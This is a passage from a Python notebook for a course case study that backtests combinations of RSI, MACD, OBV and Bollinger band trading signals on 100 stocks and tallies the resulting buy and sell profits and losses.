# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "RSI, macd", "RSI>25, macd (4,15)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\RSI 25 MACD 415 Buy_Sell list.csv')
# +
# LETS LOOK AT A COMBINED STRATEGY
# COMBINED STRATEGY COVERING RSI, MACD AND OBV
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
daily_data_back_test['TradingStrategyRSI_revised'] = np.where(daily_data_back_test['rsi'] > 25, "positive", "negative")
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "negative": # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive": # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "RSI, macd, OBV", "RSI>25, macd (4,15)-9, Cum Pos OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(30)
Summary_Report_df.head(30)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\RSI 25 MACD 415 OBV Buy_Sell list.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR OBV STRATEGY
# OBV - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# results show 42 positive and a loss - so by itself - OBV may not be helpful
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['OBV'])
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['OBV'])
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'OBV']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "OBV", "Cumulative Positive OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\OBV Buy_Sell list.csv')
# +
# LETS LOOK AT A COMBINED STRATEGY
# COMBINED STRATEGY COVERING BOLLINGER, MACD AND OBV
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategymacd'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# +
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_macd_obv'] = dataframe_COMBINED_corrected['COMBINED'].values
# +
# REVISION4 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
# if df_group.loc[row_index, 'macd'] > -250: # additional condition added
if df_group.loc[row_index, 'TradingStrategyCombined_bol_macd_obv'] == "SELL":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
# if df_group.loc[row_index, 'macd'] > -250: # additional condition added
if df_group.loc[row_index, 'TradingStrategyCombined_bol_macd_obv'] == "ENTER":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, MACD, OBV", "Bollinger Middle Band; MACD (12,26)>9, +ve Cum OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 51 out of 100 (better than OBV, closer to MACD but no where close to 66% thats expected) . And its a LOSS
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger MACD 1226 OBV Buy_Sell list.csv')
# +
# SINCE THE COMBINED STRATEGY COVERING BOLLINGER, MACD AND OBV DID NOT YIELD DESIRED RESULTS - LETS TRY ANOTHER COMBINATION
# THIS IS SUPPOSED TO YIELD BETTER RESULTS
# COMPRISING BOLLINGER, RSI AND OBV
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyRSI'] == "positive":
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# +
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_rsi_obv'] = dataframe_COMBINED_corrected['COMBINED'].values
# +
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_obv'] == "SELL":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_obv'] == "ENTER":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, RSI, OBV", "Bollinger Middle Band; RSI > 50, +ve Cum OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger RSI 50 OBV Buy_Sell list.csv')
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLINGER AND RSI
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyRSI'] == "positive":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# +
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_rsi'] = dataframe_COMBINED_corrected['COMBINED'].values
# +
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi'] == "SELL":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi'] == "ENTER":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
